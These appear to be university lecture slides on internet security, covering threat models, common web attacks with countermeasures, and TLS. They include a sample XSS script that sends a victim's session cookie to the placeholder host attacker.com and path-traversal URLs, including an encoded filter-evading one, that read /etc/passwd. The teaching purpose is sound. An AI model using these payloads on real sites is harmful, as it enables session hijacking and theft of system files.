Internet Security

CS 312 - Internet Concepts

Old Dominion University

Many of these slides created by Dr. Ralph Grove, Dr. Michele C. Weigle
Outline
• Security Terminology
• Attack Types
• Buffer Overflow, Cross-Site Scripting (XSS), Insider Misuse,
Sniffing, Spoofing, SQL Injection, URL Manipulation,
Phishing
• Transport Layer Security

2
 What's Wrong with the Web?
Crime
• 2019: 467,361 complaints with
losses > $3.5 B in the US
• Top crimes: phishing, non-
payment/delivery,
extortion, data breach

• CSIS estimates $600 B in losses

globally each year

FBI, 2019 Internet Crime Report, https://pdf.ic3.gov/2019_IC3Report.pdf

Center for Strategic and International Studies (CSIS), Economic Impact of Cybercrime, 2018, https://www.csis.org/analysis/economic-impact-cybercrime
3
 Desirable Security Characteristics
C - I - A triad
• Confidentiality • Authentication
• privacy of information • reliable identification of all
• Integrity parties
• protection of information • Authorization
against change • restriction of privileges /
• Availability abilities
• provision of service as • Accountability
needed • non-repudiation of individual
actions
4
Security Terminology
• Threat: A future event that is possible (indefinite) and harmful
• Ex: Someone steals your password and sends malicious email messages

• Attack: An actual incident that is intended to cause harm

• may be successful or not
• an attacker initiates the incident, a victim is harmed

• Vulnerability: A system flaw that enables an attack to succeed

• may be related to software, hardware, personnel, or procedures

• Counter-measure: A method to defeat an attack

• may be in software, hardware, procedures, training, etc.
5
Threat Example
• Threat: Theft of userids and passwords from an online system

• Attack: Attacker uses a brute-force password attack on the root

database server and steals DB backup files

• Vulnerability: Weak system security

• Counter-Measure: Use strong passwords; Strengthen firewall

and intrusion detection system
6
Threat Model
• A comprehensive list of reasonably likely threats
• What's reasonably likely depends on the value of the asset
• e.g., military databases are subject to attack by trained cyber-spies
my email account, OTOH, might be attacked by low-order criminals

• Threat Model may include

• Skills and resources of attacker
• Objective of attacker
• Method of attack, potential vulnerabilities
• Harm that could result from the attack
7
Threat Model Example
• A threat model for an office computer
• Attacker walks in and steals confidential information
• Attacker walks in and plants malware on the computer
• A remote attacker plants ransomware on the system
• A thief steals the physical computer
• ...etc.

8
Threat Model Uses
1.Guide software design
Helps designers to assess the required degree of security

2.Guide testing
Helps testers to know what vulnerabilities to look for

3.Set standards for monitoring

Helps sysadmins to know what sorts of attacks to watch for
when the system is operational
9
Think, Discuss, Explain
• Consider the Canvas learning system

• What threats are reasonable? Consider the attacker's

• Motive - why?
• Means - how?
• Skill set

10
Outline
• Security Terminology
• Attack Types
• Buffer Overflow, Cross-Site Scripting (XSS), Insider Misuse,
Sniffing, Spoofing, SQL Injection, URL Manipulation,
Phishing
• Transport Layer Security

11
Buffer
• Buffer: An area in memory where data is held for processing

input buffer
data source
xxxxxxxxxxxxxxxxxxxx
Processor
output buffer
data xxxxxxxxxxxxxxxxxxxx
consumer

12
Buffer Overflow Threat
• Threat: Buffer Overflow
• Vulnerability: An unchecked
input buffer
• Attack: Attacker enters a
long input string that
overruns the available buffer
space, thereby overwriting
executable code or
configuration
13
Buffer Overflow Countermeasures
• For programmers:
• Use a string-safe language (e.g., Java, C#)
• Check the length of every input (C, C++)

• For sysadmins:
• Update all system components (OS, DBMS, etc.) regularly, so that
recent patches are applied immediately

14
Think, Discuss, Explain*
• What indicates that this might be a buffer overflow attack?

http://www.myapp.com/login?
x7afkmvkf85l9keiw7cjaldkfjai4qlmchjsd62jakifui434a090998afdafhq4j
4jalja88sjsdjfhkjhmca83k11jajhk

long parameter name no parameter value

15
Outline
• Security Terminology
• Attack Types
• Buffer Overflow, Cross-Site Scripting (XSS), Insider Misuse,
Sniffing, Spoofing, SQL Injection, URL Manipulation,
Phishing
• Transport Layer Security

16
 Cross-Site Scripting (XSS) Threat
• Threat: Attacker hijacks victim's session
• Vulnerability: Unfiltered input stream
• Attack:
1. Attacker posts malicious HTML+JavaScript on a forum
2. Victim views (downloads) malicious code on forum, and clicks an included link
3. Victim's session cookie is transmitted to Attacker
4. Attacker obtains Victim's sessionId, and hijacks Victim's session
Attacker 1. Forum 2.
Victim
4.
Attacker's Server 3.
17
 XSS Attack

http://www.acunetix.com/blog/articles/persistent-cross-site-scripting/

18
XSS Attack
• Malicious Code:
<div id="div1"></div>
<script>
var p = '<p><a href="http://attacker.com?cookie='
+ document.cookie + '">Click here!</p>';
document.getElementById('div1').innerHtml = p;
</script>

• Hyperlink:
Click here!
actually goes to http://attacker.com/?cookie=PHPSESSID=388PKQ838...

19
XSS Countermeasures
1.Filter all input
• reject input containing HTML or JavaScript, or
• change delimiters to HTML entity codes upon input:
< &lt; > &gt; etc.
<a href="..."> becomes &lt;a href="..."&gt; - displayed, not
executed

2.Use built-in language safety features, e.g.,

$input = htmlspecialchars($input); // convert delimiters to HTML
entities

< becomes &lt; etc.

20
3.Mark cookies as "HttpOnly", i.e., not readable by JavaScript
Think, Discuss, Explain*
1. What does marking a cookie as "HttpOnly" accomplish?

2. What does an effective XSS attack gain for the attacker?

3. How is the victim harmed in an XSS attack?

21
How common are internet attacks?
Live Threat Maps:
• https://livethreatmap.radware.com/
• https://threatmap.checkpoint.com/
• https://attackmap.sonicwall.com/live-attack-map/
• https://cybermap.kaspersky.com/

Reference website: https://norse-corp.com/map/

22
Outline
• Security Terminology
• Attack Types
• Buffer Overflow, Cross-Site Scripting (XSS), Insider Misuse,
Sniffing, Spoofing, SQL Injection, URL Manipulation,
Phishing
• Transport Layer Security

23
Are Cyber attacks limited to personal/theft?
• No, concerns are real and myriad, generally fall into cyberwarfare
and cyber-terrorism categories
• References: https://
www.fortinet.com/resources/cyberglossary/most-notorious-attacks-
in-the-history-of-cyber-warfare

https://
www.csis.org/programs/strategic-technologies-program/significant-
cyber-incidents

24
Hypothesis: the most serious acts of cyber
terrorism are kept secret. Why?
• Cyber Warfare in the Ukraine?

https://www.reuters.com/world/europe/factbox-the-cyber-war-betwe
en-ukraine-russia-2022-05-10
/

Digital interdiction
Propaganda and information blackouts.
Remote control vehicles: air and sea based drones

25
Insider Misuse Threat
• Threat Models typically anticipate external attacks
• Much IT crime is perpetrated by company insiders
(employees)

Attacker
Server
Insider

Firewall

26
Insider Misuse Threat
• Threat: An insider (employee) gains unauthorized access to to
facilities, and steals or manipulates data
• Vulnerability: Lack of internal security, lack of awareness
• Attack: Attacker (insider) logs into server and manipulates data
or software

• Countermeasure: Establish a DMZ* to isolate operation facilities

* demilitarized zone
27
Insider Misuse Countermeasure
• Insiders are blocked from operations servers
(except privileged sysadmins)
DMZ

Attacker Insider

Ops
Server Dev
Server

Firewall
Firewall

28
Think, Discuss, Explain*
1. Why is insider misuse often overlooked in security plans?

2. What is a DMZ and how does it block insider threats?

29
Outline
• Security Terminology
• Attack Types
• Buffer Overflow, Cross-Site Scripting (XSS), Insider Misuse,
Sniffing, Spoofing, SQL Injection, URL Manipulation,
Phishing
• Transport Layer Security

30
Sniffing Threat
• Threat: Attacker steals
confidential information

• Vulnerability: Unsecured
communication channel

• Attack: Attacker monitors

plain-text network traffic, and
searches for valuable
confidential information (e.g.,
credit card info) 31
Sniffing Countermeasure
• 1. Use HTTPS/TLS to encrypt messages

• 2. Use a VPN (virtual private network) to create a secure tunnel

between client and server

Client
VPN Tunnel

Network VPN Server

Server

32
Outline
• Security Terminology
• Attack Types
• Buffer Overflow, Cross-Site Scripting (XSS), Insider Misuse,
Sniffing, Spoofing, SQL Injection, URL Manipulation,
Phishing
• Transport Layer Security

33
Spoofing Threat
• Threat: Attacker steals users' login credentials via a false website

• Vulnerability: Lack of site security, user gullibility, carelessness

• Attack: Attacker creates a false website, identical to the real one,

and presents the fake URL to victims, who use it to attempt a
login.

Attacker steals credentials, and can then login to the real site.
34
What's wrong with this website?

35
Spoofing Countermeasures
1.User education – never click email links

2.Make URLs simple (e.g., www.odu.edu) so that they can be

entered quickly and easily

3.Use challenge-response interactions, two-channel

authentication

4.Use HTTPS, which helps to authenticate the server

36
Outline
• Security Terminology
• Attack Types
• Buffer Overflow, Cross-Site Scripting (XSS), Insider Misuse,
Sniffing, Spoofing, SQL Injection, URL Manipulation,
Phishing
• Transport Layer Security

37
Database Vulnerabilities
• Much of the data held in web servers is stored in databases
• accessed through SQL commands

• Common commands
• CREATE TABLE – creates a new database table
• ALTER TABLE – changes the contents of the table
• INSERT INTO – insert a record into a table
• SELECT * FROM – return data from the table matching some query
• DROP TABLE – delete the table
SQL Injection
• Web forms that are used as input to
SQL database queries are
susceptible to SQL injection attacks

• How can you prevent these types of

attacks?
• properly validating input
• preventing data from web forms from
directly modifying SQL statements

39
 SQL Injection

https://xkcd.com/327/

40
Outline
• Security Terminology
• Attack Types
• Buffer Overflow, Cross-Site Scripting (XSS), Insider Misuse,
Sniffing, Spoofing, SQL Injection, URL Manipulation,
Phishing
• Transport Layer Security

41
URL Manipulation Attack
• URL components: scheme:domain:port:resource
e.g., http://www.cs.odu.edu:80/~rgrove/cs312

• The resource is typically associated with a directory

e.g., /home/rgrove/secure_html/cs312
/
-home
• The directory is part of a file structure: -rgrove
-secure_html
-cs312

42
URL Manipulation Attack
• Threat: Attacker gains access to confidential information
• Vulnerability: Unprotected server system resources (excess privilege)
• Attack: Attacker manipulates URL to traverse file system
/
http://www.cs.odu.edu/~rgrove/../../../etc/passwd -home
-rgrove
-secure_html

http://www.cs.odu.edu/~rgrove/..%2F.. %2F.. %2Fetc%2Fpasswd

*slashes replaced with escape characters to get past input filters -etc
-passwd

43
URL Manipulation Countermeasures
1.Filter input to remove '/' and equivalent codes (or '\' for
Win)

2.Properly protect all directories & files (least privilege)

3.Disallow browsing of root directories

4.Disallow browsing of directories not containing an index file

44
Outline
• Security Terminology
• Attack Types
• Buffer Overflow, Cross-Site Scripting (XSS), Insider Misuse,
Sniffing, Spoofing, SQL Injection, URL Manipulation,
Phishing
• Transport Layer Security

45
 Phishing
• Phishing attacks are used to obtain
sensitive personal information, such
as social security numbers, credit
card numbers, passwords, by
masquerading as a legitimate
website or email.
https://it.sheridancollege.ca/selfhelp/security/images/phishing-samples/amazon-phish.jpg

• Often phishing emails and websites have misspellings or grammatical

errors that give them away
• Some are quite sophisticated and realistically copy the look and feel of a
legitimate website.
46
Phishing Threat
• Threat: Attacker motivates victim to divulge confidential information

• Vulnerability: Victim is gullible, unaware; System lacks user protection

• Attack: Attacker sends victim an urgent message, requesting victim to

take some action, via a fraudulent website often, that divulges
confidential information (e.g., login credentials)

47
Phishing
Example

actually a link to
www.attacker.com

from your boss!

48
Phishing

http://face-book-tips.blogspot.com/2011/06/phishing-scam-alert-comment-spam-leads.html

49
Phishing Countermeasures
1.Train employees continuously
• do not click links in email or other messages
• confirm unusual, suspicious requests
• require two parties for all financial transactions

2.Use email filters to block spam and to remove suspicious

links

50
Spear Phishing
• Phishing attacks targeted at high-level people

• April 2011, Oak Ridge National Labs

• email sent from "Human Resources Department"
• directed users to login to HR account to ensure that benefits are
available
• targeted only 530 employees
• 57 people clicked on the link
• 2 with unprotected computers
• hackers gained access to ORNL servers and data
51
Think, Discuss, Explain*
• What phishing emails have you received at ODU?

• What is tunnel-vision, and how does it work to the attacker's

advantage in the case of phishing?

52
Outline
• Security Terminology
• Attack Types
• Buffer Overflow, Cross-Site Scripting (XSS), Insider Misuse,
Sniffing, Spoofing, SQL Injection, URL Manipulation,
Phishing
• Transport Layer Security

53
Transport Layer Security (TLS)
• Originally Secure Sockets Layer (SSL)
• SSL developed by Netscape, 1995 TLS
• Replaced by TLS, 1999

• Added Value:

• Server / Client authentication

• Message Encryption

54
 TLS Server Authentication
• Servers are authenticated by Certificates
2. Server sends
certificate to client via
TLS
Client Server

1. Certificate Authority
Certificate
issues a signed
3. Client verifies Authority
certificate
server's certificate
with CA
55
TLS Server Authentication
• Web browsers ship with 2. Server sends
predefined CA certificates, certificate to
client via TLS
to establish initial trust Client Server

• Clients can also Certificate 1. Certificate

authenticate to server, but Authority Authority
certificates are expensive 3. Client verifies
server's certificate
issues a
signed
with CA certificate
requires an initial
trust link between
client and CA
56
TLS Handshake Client Server

• The Client and Server hello

start by sharing information

and negotiating an
encryption key for the session
certificate

• The client can also provide

a certificate, but usually key negotiation

it's just the server

57
TLS Encryption Client Server

• Each message is
encrypt
encrypted / decrypted request

decrypt
• A complete HTTP
transaction requires response encrypt
four encryption/
decryption operations
decrypt

58
Outline
• Security Terminology
• Attack Types
• Buffer Overflow, Cross-Site Scripting (XSS), Insider Misuse,
Sniffing, Spoofing, SQL Injection, URL Manipulation,
Phishing
• Transport Layer Security

59